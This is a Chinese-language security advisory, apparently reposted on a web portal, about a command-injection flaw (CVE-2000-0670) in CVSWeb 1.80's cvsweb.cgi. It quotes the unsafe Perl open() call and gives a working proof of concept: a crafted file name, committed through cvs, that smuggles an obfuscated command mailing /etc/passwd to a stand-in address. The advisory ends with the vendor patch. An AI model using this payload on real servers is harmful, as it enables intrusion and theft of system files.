CVSWeb的cvsweb.cgi远程执行任意命令漏洞

2008-04-09 04:32:36来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

CVSWeb的cvsweb.cgi远程执行任意命令漏洞

发布日期:2000-07-12
更新日期:2000-07-12

受影响系统:
Zeller CVSWeb 1.80
不受影响系统:
Zeller CVSWeb 1.89
Zeller CVSWeb 1.86
描述:
BUGTRAQ ID: 1469
CVE(CAN) ID: CVE-2000-0670

CVSWeb是一种基于Web的可被用来在主机之间共享程序代码的软件开发工具。

Cvsweb 1.80存在一个安全漏洞,远程攻击者只要对cvs库有写权限,就可以获得对cvs server的shell访问权限,以CVS守护进程的权限执行任意命令。

出问题的代码在cvsweb.cgi脚本中:

open($fh, "rlog '$filenames' 2>/dev/null |")

由于对Perl的open()函数被错误调用,攻击者可以通过建立一个特殊的文件名,来发动攻击。


<*来源:Joey Hess (joey@kitenet.net)

链接:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0670
http://online.securityfocus.com/bid/1469/info/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

攻击者会首先按照下列步骤操作:

SHELLCODE="';perl -e '\$_=q{mail foo#bar.baz < !etc!passwd}; y:!#:\x2F\x40:; system \$_';'"
touch $SHELLCODE
cvs add $SHELLCODE
cvs commit -m '' $SHELLCODE

然后攻击者会访问cvsweb页面,浏览他设置木马文件的目录。这将导致/etc/passwd 文件被发送给攻击者,当然攻击者也可以执行其他的命令。

建议:
厂商补丁:

Zeller
------
厂商已经在1.86版的软件中修补了这个安全漏洞,请到厂商的主页下载:

http://stud.fh-heilbronn.de/~zeller/cgi/cvsweb.cgi/

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:WorldClient 2.1 HTTP文件泄漏漏洞

下一篇:Big Brother 远程文件泄漏漏洞